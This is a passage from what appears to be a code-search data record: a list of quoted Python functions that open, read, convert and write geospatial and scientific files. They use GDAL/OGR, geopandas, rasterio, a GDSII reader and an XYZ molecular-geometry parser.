0:\n layer_options['srs'] = '{0}:{1}'.format(srs.GetAuthorityName(None), srs.GetAuthorityCode(None))\n\n n = 0\n while True:\n n += 1\n try:\n target_layer = self.create_target_dataset(target_file, layer_name, srs, layer_type,\n options=target_create_options)\n except RuntimeError as e:\n # logger.exception('exception in creating target dataset')\n # the layer already exists in the target store, increment the name\n if 'Use the layer creation option OVERWRITE=YES to replace it.' 
in e.message:\n layer_name = increment(layer_name)\n\n # try 100 times to increment then break\n if n >= 100:\n break\n\n continue\n else:\n raise e\n break\n\n # adding fields to new layer\n layer_definition = ogr.Feature(layer.GetLayerDefn())\n source_fid = None\n\n wkb_field = 0\n\n for i in range(layer_definition.GetFieldCount()):\n\n field_def = layer_definition.GetFieldDefnRef(i)\n\n if field_def.GetName() == target_layer.GetFIDColumn() and field_def.GetType() != 0:\n field_def.SetType(0)\n\n if field_def.GetName() != 'wkb_geometry':\n target_layer.CreateField(field_def)\n new_name = target_layer.GetLayerDefn().GetFieldDefn(i - wkb_field).GetName()\n old_name = field_def.GetName()\n\n if new_name != old_name:\n layer_options['modified_fields'][old_name] = new_name\n\n if old_name == target_layer.GetFIDColumn() and not layer.GetFIDColumn():\n source_fid = i\n else:\n wkb_field = 1\n\n if wkb_field is not 0:\n layer.SetIgnoredFields(['wkb_geometry'])\n\n for i in range(0, layer.GetFeatureCount()):\n feature = layer.GetFeature(i)\n\n if feature and feature.geometry():\n\n if not layer.GetFIDColumn():\n feature.SetFID(-1)\n\n if feature.geometry().GetGeometryType() != target_layer.GetGeomType() and \\\n target_layer.GetGeomType() in range(4, 7):\n\n conversion_function = ogr.ForceToMultiPolygon\n\n if target_layer.GetGeomType() == 5:\n conversion_function = ogr.ForceToMultiLineString\n\n elif target_layer.GetGeomType() == 4:\n conversion_function = ogr.ForceToMultiPoint\n\n geom = ogr.CreateGeometryFromWkb(feature.geometry().ExportToWkb())\n feature.SetGeometry(conversion_function(geom))\n\n if source_fid is not None:\n feature.SetFID(feature.GetField(source_fid))\n\n try:\n target_layer.CreateFeature(feature)\n\n except:\n for field in range(0, feature.GetFieldCount()):\n if feature.GetFieldType(field) == ogr.OFTString:\n try:\n feature.GetField(field).decode('utf8')\n except UnicodeDecodeError:\n feature.SetField(field, decode(feature.GetField(field)))\n except AttributeError:\n continue\n try:\n target_layer.CreateFeature(feature)\n except err as e:\n logger.error('Create feature failed: {0}'.format(gdal.GetLastErrorMsg()))\n raise e\n\n self.completed_layers.append([target_layer.GetName(), layer_options])\n\n return self.completed_layers", "def load_image(nom):\n print(\"load_image : [\", nom, \"]\")\n fic = gdal.Open(nom)\n print(fic)\n return fic.ReadAsArray(), fic.GetGeoTransform()", "def create_gdal_gis_lyr(self, file_path, lyr_name, driver_name='GPKG', add_lyr=False):\n raise EODataDownException(\"Not Implemented\")", "def loadGeoTransform(filepath):\n \n from osgeo import gdal\n \n ds = gdal.Open(filepath, 0)\n \n return ds.GetGeoTransform()", "def load_raster(input):\n dem = gdal.Open(input)\n\n nodata = []\n layers = []\n for i in range(1, dem.RasterCount+1):\n band = dem.GetRasterBand(i)\n data = band.ReadAsArray(0, 0, dem.RasterXSize, dem.RasterYSize)\n layers.append(data)\n nodata.append(band.GetNoDataValue())\n\n if len(layers) > 1:\n layers = N.dstack(layers) \n\n info = attrdict(\n metadata=dem.GetMetadata_Dict(),\n grid=Grid.from_gdal(dem),\n nodata=nodata)\n\n return (info,layers)", "def load_from_geojson(self, filename_or_url):", "def from_featureclass(filename, **kwargs):\r\n from .io import from_featureclass\r\n gis = kwargs.pop('gis', arcgis.env.active_gis)\r\n if HASARCPY:\r\n return from_featureclass(filename=filename, **kwargs)\r\n elif isinstance(gis, GIS) and \\\r\n gis._con._auth.lower() != \"anon\":\r\n return from_featureclass(filename=filename, 
**kwargs)\r\n else:\r\n raise Exception(\"Cannot create the SpatialDataFrame, you must \" +\\\r\n \"have an authenticated GIS.\")", "def read(self, format=None, epsg=None):\n if not format:\n format = self.default_output\n if self.ext not in formats.VECTOR:\n raise UnsupportedFormatException(\n \"Only the following vector formats are supported: {}\".format(\n ','.join(formats.VECTOR)\n )\n )\n if self.data is None:\n self.data = geopandas.read_file(self.uri)\n if self.filters:\n self.filter_data()\n return self.transform_data(format, epsg)", "def load_loss_GDF(filename, lon, lat):\n df = pd.read_csv(filename)\n x, y = np.meshgrid(lon, lat)\n coords = [Point(xval, yval) for xval, yval in zip(x.ravel(), y.ravel())]\n \n df['geometry'] = coords\n df = gpd.GeoDataFrame(df)\n df.crs = {'init': 'epsg:4326'}\n return df", "def read(f, missing=np.nan):\n import gdal\n if f.is_zipped():\n f = unzip(f) # Unzip and return a File\n\n geotiff = gdal.Open(f.fullpath())\n if geotiff is None:\n raise RuntimeError(\"Could not open unzipped geotiff file\",f)\n\n band = geotiff.GetRasterBand(1)\n data = band.ReadAsArray(0, 0, geotiff.RasterXSize, geotiff.RasterYSize)\n\n del(geotiff)\n os.remove(f.fullpath())\n\n data[data<0] = missing\n\n return data", "def create_dat_from_shapefile(windgrid_file, DAT_header, output_file, wind_field='Vg_mph'):\n t0 = time()\n output_file = output_file + '.dat'\n print('reading windgrid')\n t1 = time()\n gdf = gpd.read_file(windgrid_file)\n create_dat_from_geodataframe(\n gdf, DAT_header, output_file, wind_field=wind_field)", "def file_open(path: str, mode: str):\n if _path_on_gcp(path):\n return tf.io.gfile.GFile(path, mode)\n return open(path, mode)", "def read_gds(\n self,\n infile,\n units=\"skip\",\n rename={},\n rename_template=\"{name}\",\n layers={},\n datatypes={},\n texttypes={},\n ):\n self._references = []\n close = True\n if hasattr(infile, \"__fspath__\"):\n infile = open(infile.__fspath__(), \"rb\")\n elif isinstance(infile, (basestring, Path)):\n infile = open(infile, \"rb\")\n else:\n close = False\n emitted_warnings = []\n kwargs = {}\n create_element = None\n factor = 1\n cell = None\n properties = {}\n attr = -1\n for record in _record_reader(infile):\n # LAYER\n if record[0] == 0x0D:\n kwargs[\"layer\"] = layers.get(record[1][0], record[1][0])\n # DATATYPE or BOXTYPE\n elif record[0] == 0x0E or record[0] == 0x2E:\n kwargs[\"datatype\"] = datatypes.get(record[1][0], record[1][0])\n # TEXTTYPE\n elif record[0] == 0x16:\n kwargs[\"texttype\"] = texttypes.get(record[1][0], record[1][0])\n # XY\n elif record[0] == 0x10:\n if \"xy\" in kwargs:\n kwargs[\"xy\"] = numpy.concatenate((kwargs[\"xy\"], factor * record[1]))\n else:\n kwargs[\"xy\"] = factor * record[1]\n # WIDTH\n elif record[0] == 0x0F:\n kwargs[\"width\"] = factor * abs(record[1][0])\n if record[1][0] < 0:\n kwargs[\"width_transform\"] = False\n # ENDEL\n elif record[0] == 0x11:\n if create_element is not None:\n el = create_element(**kwargs)\n if len(properties) > 0:\n el.properties = properties\n properties = {}\n cell.add(el)\n create_element = None\n kwargs = {}\n # BOUNDARY\n elif record[0] == 0x08:\n create_element = self._create_polygon\n # PATH\n elif record[0] == 0x09:\n create_element = self._create_path\n # BOX\n elif record[0] == 0x2D:\n create_element = self._create_polygon\n if record[0] not in emitted_warnings:\n warnings.warn(\n \"[GDSPY] GDSII elements of type BOX are imported as polygons.\",\n stacklevel=2,\n )\n emitted_warnings.append(record[0])\n # TEXT\n elif record[0] == 
0x0C:\n create_element = self._create_label\n # SNAME\n elif record[0] == 0x12:\n if record[1] in rename:\n name = rename[record[1]]\n else:\n name = rename_template.format(name=record[1])\n kwargs[\"ref_cell\"] = name\n # COLROW\n elif record[0] == 0x13:\n kwargs[\"columns\"] = record[1][0]\n kwargs[\"rows\"] = record[1][1]\n # STRANS\n elif record[0] == 0x1A:\n kwargs[\"x_reflection\"] = (int(record[1][0]) & 0x8000) > 0\n if (int(record[1][0]) & 0x0006) and record[0] not in emitted_warnings:\n warnings.warn(\n \"[GDSPY] Absolute magnification or rotation of \"\n \"references is not supported. Transformations \"\n \"will be interpreted as relative.\",\n stacklevel=2,\n )\n emitted_warnings.append(record[0])\n # MAG\n elif record[0] == 0x1B:\n kwargs[\"magnification\"] = record[1][0]\n # ANGLE\n elif record[0] == 0x1C:\n kwargs[\"rotation\"] = record[1][0]\n # SREF\n elif record[0] == 0x0A:\n create_element = self._create_reference\n # AREF\n elif record[0] == 0x0B:\n create_element = self._create_array\n # STRNAME\n elif record[0] == 0x06:\n if record[1] in rename:\n name = rename[record[1]]\n else:\n name = rename_template.format(name=record[1])\n cell = Cell(name, exclude_from_current=True)\n if name in self.cells:\n raise ValueError(\"[GDSPY] Multiple cells with name: {0} in GDSII file\".format(name))\n self.cells[name] = cell\n # STRING\n elif record[0] == 0x19:\n kwargs[\"text\"] = record[1]\n # ENDSTR\n elif record[0] == 0x07:\n cell = None\n # UNITS\n elif record[0] == 0x03:\n if units == \"skip\":\n factor = record[1][0]\n elif units == \"import\":\n self.unit = record[1][1] / record[1][0]\n self.precision = record[1][1]\n factor = record[1][0]\n elif units == \"convert\":\n factor = record[1][1] / self.unit\n else:\n raise ValueError(\n \"[GDSPY] units must be one of 'convert', 'import' or 'skip'.\"\n )\n # LIBNAME\n elif record[0] == 0x02:\n self.name = record[1]\n # PRESENTATION\n elif record[0] == 0x17:\n kwargs[\"anchor\"] = GdsLibrary._import_anchors[\n int(record[1][0]) & 0x000F\n ]\n # PATHTYPE\n elif record[0] == 0x21:\n kwargs[\"ends\"] = GdsLibrary._pathtype_dict.get(record[1][0], \"extended\")\n # BGNEXTN\n elif record[0] == 0x30:\n kwargs[\"bgnextn\"] = factor * record[1][0]\n # ENDEXTN\n elif record[0] == 0x31:\n kwargs[\"endextn\"] = factor * record[1][0]\n # ENDLIB\n elif record[0] == 0x04:\n for ref in self._references:\n if ref.ref_cell in self.cells:\n ref.ref_cell = self.cells[ref.ref_cell]\n # PROPATTR\n elif record[0] == 0x2B:\n attr = record[1][0]\n # PROPVALUE\n elif record[0] == 0x2C:\n properties[attr] = record[1]\n # Not supported\n elif (\n record[0] not in emitted_warnings\n and record[0] not in GdsLibrary._unused_records\n ):\n warnings.warn(\n \"[GDSPY] Record type {0} ({1:02X}) is not supported.\".format(\n GdsLibrary._record_name[record[0]], record[0]\n ),\n stacklevel=2,\n )\n emitted_warnings.append(record[0])\n if close:\n infile.close()\n return self", "def buffer(infile,outfile,erosion,dilatation):\n ds_in=ogr.Open( infile )\n lyr_in=ds_in.GetLayer(0)\n drv=ds_in.GetDriver()\n ds_out = drv.CreateDataSource(outfile)\n layer = ds_out.CreateLayer( lyr_in.GetLayerDefn().GetName(),lyr_in.GetSpatialRef(), ogr.wkbPolygon)\n n_fields = lyr_in.GetLayerDefn().GetFieldCount()\n for i in xrange ( lyr_in.GetLayerDefn().GetFieldCount() ):\n field_in = lyr_in.GetLayerDefn().GetFieldDefn( i )\n fielddef = ogr.FieldDefn( field_in.GetName(), field_in.GetType() ) \n layer.CreateField ( fielddef )\n \n featuredefn = layer.GetLayerDefn()\n \n for feat in lyr_in:\n 
geom0 = feat.GetGeometryRef()\n feature0 = feat.Clone()\n feature0.SetGeometry(geom0.Buffer(float(erosion)))\n geom = feature0.GetGeometryRef()\n feature = feature0.Clone() \n feature.SetGeometry(geom.Buffer(float(dilatation)))\n layer.CreateFeature(feature)\n del geom0\n del geom\n ds_out.Destroy()\n return 0", "def loadArray(filepath):\n \n from osgeo import gdal\n \n ds = gdal.Open(filepath, 0)\n \n return ds.ReadAsArray()", "def __init__(self, geom_input, srs=None):\n str_instance = isinstance(geom_input, str)\n\n # If HEX, unpack input to a binary buffer.\n if str_instance and hex_regex.match(geom_input):\n geom_input = memoryview(bytes.fromhex(geom_input))\n str_instance = False\n\n # Constructing the geometry,\n if str_instance:\n wkt_m = wkt_regex.match(geom_input)\n json_m = json_regex.match(geom_input)\n if wkt_m:\n if wkt_m[\"srid\"]:\n # If there's EWKT, set the SRS w/value of the SRID.\n srs = int(wkt_m[\"srid\"])\n if wkt_m[\"type\"].upper() == \"LINEARRING\":\n # OGR_G_CreateFromWkt doesn't work with LINEARRING WKT.\n # See https://trac.osgeo.org/gdal/ticket/1992.\n g = capi.create_geom(OGRGeomType(wkt_m[\"type\"]).num)\n capi.import_wkt(g, byref(c_char_p(wkt_m[\"wkt\"].encode())))\n else:\n g = capi.from_wkt(\n byref(c_char_p(wkt_m[\"wkt\"].encode())), None, byref(c_void_p())\n )\n elif json_m:\n g = self._from_json(geom_input.encode())\n else:\n # Seeing if the input is a valid short-hand string\n # (e.g., 'Point', 'POLYGON').\n OGRGeomType(geom_input)\n g = capi.create_geom(OGRGeomType(geom_input).num)\n elif isinstance(geom_input, memoryview):\n # WKB was passed in\n g = self._from_wkb(geom_input)\n elif isinstance(geom_input, OGRGeomType):\n # OGRGeomType was passed in, an empty geometry will be created.\n g = capi.create_geom(geom_input.num)\n elif isinstance(geom_input, self.ptr_type):\n # OGR pointer (c_void_p) was the input.\n g = geom_input\n else:\n raise GDALException(\n \"Invalid input type for OGR Geometry construction: %s\"\n % type(geom_input)\n )\n\n # Now checking the Geometry pointer before finishing initialization\n # by setting the pointer for the object.\n if not g:\n raise GDALException(\n \"Cannot create OGR Geometry from input: %s\" % geom_input\n )\n self.ptr = g\n\n # Assigning the SpatialReference object to the geometry, if valid.\n if srs:\n self.srs = srs\n\n # Setting the class depending upon the OGR Geometry Type\n self.__class__ = GEO_CLASSES[self.geom_type.num]", "def loadProjection(filepath):\n \n from osgeo import gdal\n \n ds = gdal.Open(filepath, 0)\n \n return ds.GetProjection()", "def read_locations(db, openfile):\n pass", "def load(self, filename):\n LIB.mnt_grid_load.argtypes = [POINTER(c_void_p), c_char_p]\n fm = filename.encode('utf-8')\n ier = LIB.mnt_grid_load(self.obj, fm)\n if ier:\n error_handler(FILE, 'load', ier)", "def _open_file(cls, *args, **kwargs):\n try:\n import tensorflow as tf\n open_file = tf.io.gfile.GFile # pragma: no cover\n except Exception: # pragma: no cover\n open_file = open\n return open_file(*args, **kwargs)", "def read_geojson(cls, path_or_json_or_string_or_url):\n assert path_or_json_or_string_or_url\n data = None\n if isinstance(path_or_json_or_string_or_url, (dict, list)):\n data = path_or_json_or_string_or_url\n try:\n data = json.loads(path_or_json_or_string_or_url)\n except ValueError:\n pass\n try:\n path = path_or_json_or_string_or_url\n if path.endswith('.gz') or path.endswith('.gzip'):\n import gzip\n contents = gzip.open(path, 'r').read().decode('utf-8')\n else:\n contents = open(path, 
'r').read()\n data = json.loads(contents)\n except FileNotFoundError:\n pass\n if not data:\n import urllib.request\n with urllib.request.urlopen(path_or_json_or_string_or_url) as url:\n data = json.loads(url.read().decode())\n assert data, 'MapData accepts a valid geoJSON object, geoJSON string, path to a geoJSON file, or URL'\n return cls(cls._read_geojson_features(data))", "def isGeospatial(path):\n try:\n ds = gdal.Open(str(path), gdalconst.GA_ReadOnly)\n except Exception:\n return False\n if ds:\n if ds.GetGCPs() and ds.GetGCPProjection():\n return True\n if ds.GetProjection():\n return True\n if ds.GetGeoTransform(can_return_null=True):\n return True\n if ds.GetDriver().ShortName in {'NITF', 'netCDF'}:\n return True\n return False", "def read(self, format=None, epsg=None):\n if self.data is None:\n query, params = self.get_query()\n self.data = df_from_postgis(self.engine, query, params,\n self.geom_column, self.epsg)\n return self.transform_data(outformat=format, epsg=epsg)", "def read_gdal_coordinates(dataset, mode=\"center\"):\n coordinates_pixel = _pixel_coordinates(\n dataset.RasterXSize, dataset.RasterYSize, mode\n )\n\n geotransform = dataset.GetGeoTransform()\n coordinates = _pixel_to_map(coordinates_pixel, geotransform)\n\n return coordinates", "def gzopen(f):\n return gzip.open(f, 'rb') if f.endswith('.gz') else open(f, 'r')", "def from_file(cls, file): \n try:\n import dill as pickle\n except ImportError:\n logger.error(\"Cannot import from file, dill not installed\")\n return None\n model = pickle.load(open(file,'rb'))\n if type(model) == GeologicalModel:\n logger.info('GeologicalModel initialised from file')\n return model\n else:\n logger.error('{} does not contain a geological model'.format(file))\n return None", "def open_file(path):\n input_file = os.path.join(path)\n with open(input_file) as f:\n dataset = f.read()\n return dataset", "def check_gdf_load(gdf):\n if isinstance(gdf, (str, Path)):\n if not is_url(gdf):\n gdf = to_absolute_path(str(gdf))\n # as of geopandas 0.6.2, using the OGR CSV driver requires some add'nal\n # kwargs to create a valid geodataframe with a geometry column. see\n # https://github.com/geopandas/geopandas/issues/1234\n if str(gdf).lower().endswith(\"csv\"):\n return gpd.read_file(\n gdf, GEOM_POSSIBLE_NAMES=\"geometry\", KEEP_GEOM_COLUMNS=\"NO\"\n )\n try:\n return gpd.read_file(gdf)\n except (DriverError, CPLE_OpenFailedError):\n logging.warning(\n f\"GeoDataFrame couldn't be loaded: either {gdf} isn't a valid\"\n \" path or it isn't a valid vector file. 
Returning an empty\"\n \" GeoDataFrame.\"\n )\n return gpd.GeoDataFrame()\n elif isinstance(gdf, gpd.GeoDataFrame):\n return gdf\n else:\n raise ValueError(f\"{gdf} is not an accepted GeoDataFrame format.\")", "def load(src_path):\n satdat = rasterio.open(src_path)\n return satdat", "def geotiff_read(ifile,metaData):\r\n\r\n file = gdal.Open(ifile, GA_ReadOnly)\r\n\r\n projection = file.GetProjection()\r\n src = osr.SpatialReference()\r\n src.ImportFromWkt(projection)\r\n proj = src.ExportToWkt()\r\n\r\n Nx = file.RasterXSize\r\n Ny = file.RasterYSize\r\n\r\n trans = file.GetGeoTransform()\r\n\r\n dx = trans[1]\r\n dy = trans[5]\r\n\r\n if metaData == \"A\":\r\n\r\n xp = np.arange(Nx)\r\n yp = np.arange(Ny)\r\n\r\n (Xp, Yp) = np.meshgrid(xp,yp)\r\n\r\n X = trans[0] + (Xp+0.5)*trans[1] + (Yp+0.5)*trans[2] #FIXME: bottleneck!\r\n Y = trans[3] + (Xp+0.5)*trans[4] + (Yp+0.5)*trans[5]\r\n\r\n if metaData == \"P\":\r\n\r\n xp = np.arange(Nx)\r\n yp = np.arange(Ny)\r\n\r\n (Xp, Yp) = np.meshgrid(xp,yp)\r\n\r\n X = trans[0] + Xp*trans[1] + Yp*trans[2] #FIXME: bottleneck!\r\n Y = trans[3] + Xp*trans[4] + Yp*trans[5]\r\n\r\n band = file.GetRasterBand(1)\r\n\r\n Z = band.ReadAsArray()\r\n\r\n dx = np.abs(dx)\r\n dy = np.abs(dy)\r\n\r\n return X, Y, Z, dx, dy, proj", "def open_gzipped(infile, mode='rt'):\n import gzip\n import bz2\n if mode.startswith('r'):\n tmode = 'rt'\n bmode = 'r'\n elif mode.startswith('w'):\n tmode = 'wt'\n bmode = 'w'\n elif mode.startswith('a'):\n tmode = 'at'\n bmode = 'a'\n if hasattr(infile, 'write'):\n return infile\n if isinstance(infile, str):\n if infile.endswith('.gz'):\n return gzip.open(infile, tmode)\n if infile.endswith('.bz2'):\n if hasattr(bz2, 'open'):\n return bz2.open(infile, tmode)\n else:\n return bz2.BZ2File(infile, bmode)\n return open(infile, tmode)", "def open(self, file):\n\n # Check if file exists\n if not os.path.exists(file):\n logging.warning(f'{file} does not exist')\n return\n try:\n # Open nx file\n self.file.load(file)\n except:\n logging.exception(f'Unable to open {file}')", "def _initialize_geospatial_data(self):\n driver = ogr.GetDriverByName(\"ESRI Shapefile\")\n\n bnd_src = driver.Open(self._spatial_filename, 0)\n bnd_lyr = bnd_src.GetLayer()\n (self.spatial_index,\n self.spatial_feats,\n self.bison_spatial_fields\n ) = self._create_spatial_index(bnd_lyr)", "def open_file(file_name):\n pass", "def open(self, filename):\n raise NotImplementedError", "def openFile(file):\n file = file.lower()\n if file.endswith('.bz2'):\n return bz2.BZ2File(file)\n elif file.endswith('.gz'):\n return gzip.open(file)\n return open(file)", "def read_gfs_data(fname, lat, lon, interp=None, step=200.):\n pass", "def fileopen(file):\n return _posixfile_().fileopen(file)", "def geogrid_from_gdalInMem(ds):\n in_data = ds.GetRasterBand(1).ReadAsArray()\n in_xdim = ds.RasterXSize\n in_ydim = ds.RasterYSize\n in_geotransform = ds.GetGeoTransform()\n in_xvals = np.linspace(\n in_geotransform[0] + 0.5 * in_geotransform[1],\n in_geotransform[0] + (in_xdim - 0.5) * in_geotransform[1],\n in_xdim)\n in_yvals = np.linspace(\n in_geotransform[3] + 0.5 * in_geotransform[5],\n in_geotransform[3] + (in_ydim - 0.5) * in_geotransform[5],\n in_ydim)\n in_wkt = ds.GetProjection()\n\n return GeoGrid(in_data, in_xvals, in_yvals, in_wkt, warn=True)", "def load(filename):\n return GesFile(filename)", "def geogrid_as_gdalInMem(gg):\n in_xdim = len(gg.x)\n in_ydim = len(gg.y)\n in_datatype = get_gdal_datatype(gg.data_array.dtype)\n in_geotransform = gg.geotransform\n in_wkt = gg.wkt\n 
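# Minimal sketch (assumes geopandas and rasterio are installed; paths are
# placeholders): the higher-level loaders used by the surrounding helpers.
import geopandas as gpd
import rasterio

def load_vector(path):
    # Any OGR-supported vector source (Shapefile, GeoPackage, GeoJSON, ...).
    return gpd.read_file(path)

def load_raster(path):
    with rasterio.open(path) as src:
        data = src.read(1)        # first band as a NumPy array
        return data, src.transform, src.crs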
in_data = gg.data_array\n\n ds = gdal.GetDriverByName('MEM').Create(\n '', in_xdim, in_ydim, 1, in_datatype)\n ds.SetProjection(in_wkt)\n ds.SetGeoTransform(in_geotransform)\n ds.GetRasterBand(1).WriteArray(in_data)\n\n return ds", "def load_from_file(path, bands):\n dataset = gdal.Open(path, gdal.GA_ReadOnly)\n array = dataset.ReadAsArray()\n\n if len(array.shape) == 3:\n # The bands column is in the first position, but we want it last\n array = np.rollaxis(array, 0, 3)\n elif len(array.shape) == 2:\n # This image seems to have one band, so we add an axis for ease\n # of use in the rest of the library\n array = array[:, :, np.newaxis]\n\n image = array.astype('float32')\n\n return SatelliteImage(dataset, image, bands)", "def _open(self, file_path=None):\n\t\tif file_path is None:\n\t\t\tfile_path = self.file_path\n\n\t\tif not os.path.exists(file_path):\n\t\t\traise ValueError('Could not find file: {}'.format(file_path))\n\n\t\ttry:\n\t\t\tf = open(file_path, encoding='utf-8', newline='')\n\t\texcept OSError as err:\n\t\t\tself.log.error(str(err))\n\t\t\traise ValueError('Could not open file: {}'.format(file_path))\n\n\t\treturn f", "def read(self, as_numpy_array=False, as_single_band=True,\n old_nodata=None, new_nodata=None, epsg=None):\n if self.ext not in formats.RASTER:\n raise UnsupportedFormatException(\n \"Only the following raster formats are supported: {}\".format(\n ','.join(formats.RASTER)\n )\n )\n self.basename = os.path.basename(self.uri)\n if not self.data:\n self.data = gdal.Open(self.uri)\n out_data = self.data\n if epsg and self.get_epsg() != epsg:\n out_data = reproject(self.data, epsg)\n\n if as_numpy_array:\n return raster_to_numpy_array(out_data, as_single_band,\n old_nodata, new_nodata)\n else:\n return out_data", "def ReadRaster(cls,infile):\r\n try:\r\n import gdal\r\n import rasterio\r\n except:\r\n raise ImportError(\"Can not import module GDAL or RasterIO\")\r\n\r\n with rasterio.open(infile) as src:\r\n transform = src.meta['transform']\r\n nBands = (src.indexes)\r\n array = src.read_band(1)\r\n return array\r\n #except:\r\n # raise ImportError(\"Can not read band\")\r", "def readfile(filename, encoding=None, legacy_mode=False):\n if not is_dxf_file(filename):\n raise IOError(\"File '{}' is not a DXF file.\".format(filename))\n\n info = dxf_file_info(filename)\n with io.open(filename, mode='rt', encoding=info.encoding, errors='ignore') as fp:\n dwg = read(fp, legacy_mode=legacy_mode, dxfversion=info.version)\n\n dwg.filename = filename\n if encoding is not None and is_supported_encoding(encoding):\n dwg.encoding = encoding\n return dwg", "def open(self, infile, cache=True):\n return _image.image_open(self, infile, cache)", "def open(self, path, mode='r', encoding=None, newline=None):\n return DataSource.open(self, self._fullpath(path), mode,\n encoding=encoding, newline=newline)", "def _load_file(self, XYZ_path, bohrs=False):\n\n # Imports\n import numpy as np\n from .const import CIC, PHYS, atom_num, atom_sym\n from .error import XYZError\n from .utils import safe_cast as scast\n\n # Complain if already initialized\n if 'geoms' in dir(self):\n raise XYZError(XYZError.OVERWRITE,\n \"Cannot overwrite contents of existing OpanXYZ\", \"\")\n ## end if\n\n # Open file, read contents, close stream\n # No particular exception handling; that will be the responsibility\n # of the calling routine.\n # May want to add a check for text file format; but, really, a check\n # for no-found-geometry-information will likely cover such a case.\n with open(XYZ_path,'rU') as 
in_fl:\n self.XYZ_path = XYZ_path #: Path of file\n self.in_str = in_fl.read()\n\n # Check to ensure at least one geom match; else raise some sort of\n # error\n if not OpanXYZ.p_geom.search(self.in_str):\n raise XYZError(XYZError.XYZFILE,\n \"No valid geometry found\",\n \"XYZ file: \" + XYZ_path)\n ## end if\n\n # Store the number of atoms. XYZ files with multiple geometries will\n # be required to have the same number of atoms in all geometries.\n # This is fine for Open Anharmonic, but may be highly undesirable\n # in other applications. Beware.\n # If the .match() call doesn't have a group attribute, catch the\n # resulting AttributeError and throw an XYZError. Can't think of any\n # other situation that would throw an AttributeError here, so probably\n # I don't have to check for a subtype of AttributeError...\n # Can't think of a need for an else or a finally here\n try:\n self.num_atoms = scast(OpanXYZ.p_geom.match(self.in_str)\n .group(\"num\"), np.int_)\n except AttributeError:\n raise XYZError(XYZError.XYZFILE,\n \"No geometry block found at start of file\",\n \"XYZ file: \" + XYZ_path)\n ## end try\n\n # Initialize the description vector and geometry array\n # CANNOT use matrix type for the geometry since it's 3D.\n # Retriever function for geometry should convert the given slice\n # to a vector as an np.matrix, though.\n # Geometry is constructed as a length-3N vector of\n # coordinates, where atom 1's x/y/z coordinates are sequential,\n # then atom 2's x/y/z coordinates are sequential, etc.\n # Multiple geometries in a single XYZ file are stacked in a simple\n # array.\n self.descs = []\n self.geoms = []\n\n # Initialize the atom symbols vector\n self.atom_syms = []\n\n # Define a counter for the number of geometries. Store as a persistent\n # instance variable because it will be useful later.\n self.num_geoms = 0\n\n # Loop over the geometry blocks found in the input file\n for mch in OpanXYZ.p_geom.finditer(self.in_str):\n # Check that the number of atoms is consistent with the spec\n # found in the first geometry block\n if not scast(mch.group(\"num\"), np.int_) == self.num_atoms:\n raise XYZError(XYZError.XYZFILE,\n \"Non-constant number of atoms in multiple geometry\",\n \"XYZ file: \" + XYZ_path)\n ## end if\n\n # Store the description for the current geometry\n self.descs.append(mch.group(\"desc\"))\n\n # Assemble the coordinates vector and assemble/check the element\n # ID vector.\n # Reset the atom counter and the coordinates vector\n atom_count = 0\n coord_vec = np.empty((0,),dtype=np.float_)\n for line_mch in OpanXYZ.p_coords.finditer(mch.group(\"coord\")):\n # Check for whether element list has been fully populated\n if len(self.atom_syms) < self.num_atoms:\n # If not, continue populating it; have to check for\n # whether it's an atomic number or an element symbol\n if line_mch.group(\"el\").isdigit():\n # Atomic number\n # Check for valid number\n at_num = scast(line_mch.group(\"el\"), np.int_)\n if not (CIC.MIN_ATOMIC_NUM <= at_num\n <= CIC.MAX_ATOMIC_NUM):\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0}, atom #{1} is an \\\n unsupported element\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ##end if\n\n # Tag on the new symbol\n self.atom_syms.append(atom_sym[at_num])\n else:\n # Element symbol; store as all caps\n # Check for valid element, first by catching if the\n # specified element string is even valid\n try:\n at_num = atom_num[line_mch.group(\"el\").upper()]\n except KeyError:\n raise XYZError(XYZError.XYZFILE,\n 
\"Geometry #{0}, atom #{1} is an \\\n unrecognized element\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ## end try\n\n # Tag on the new symbol\n self.atom_syms.append(line_mch.group(\"el\").upper())\n ## end if\n else: # List is fully populated\n # If so, confirm that the element specified at the current\n # line matches that of the first geometry of the file\n # Have to check whether it's an atomic number or symbol.\n if line_mch.group(\"el\").isdigit():\n # Atomic number; don't need safe cast; must trap for\n # a bad atomic number\n at_num = scast(line_mch.group(\"el\"), np.int_)\n if not (CIC.MIN_ATOMIC_NUM <= at_num\n <= CIC.MAX_ATOMIC_NUM):\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0}, atom #{1} is an \\\n unsupported element\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ## end if\n if not atom_sym[at_num] == self.atom_syms[atom_count]:\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0}, atom #{1} is inconsistent \\\n with geometry #0\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ## end if\n\n else:\n # Element symbol\n # Check for valid element, first by catching if the\n # specified element string is even valid\n try:\n at_num = atom_num[line_mch.group(\"el\").upper()]\n except KeyError:\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0}, atom #{1} is an \\\n unrecognized element\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ## end try\n # Confirm symbol matches the initial geometry\n if not line_mch.group(\"el\").upper() == \\\n self.atom_syms[atom_count]:\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0}, atom #{1} is inconsistent \\\n with geometry #0\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ## end if\n ## end if\n ## end if\n\n # Append the three coordinates of the current atom to the\n # temp coordinates vector, converting to Bohrs if indicated.\n # Working in Bohrs is desired because they are atomic units\n # and thus are part of the internal unit definition of the\n # Hartree.\n for c_str in range(1,4):\n coord_vec = np.concatenate(\n (coord_vec, [\n scast(line_mch.group(\"c{0}\".format(c_str)), np.float_) /\n (1.0 if bohrs else PHYS.ANG_PER_BOHR)\n ]), axis=0)\n ## next c_str\n\n # Increment the atom_count for the atom number\n atom_count += 1\n\n ## next line_mch\n\n # Confirm that number of imported coordinates matches the\n # number expected from self.num_atoms\n if not coord_vec.shape[0] == 3*self.num_atoms:\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0} atom count is inconsistent\"\n .format(self.num_geoms),\n \"XYZ file: 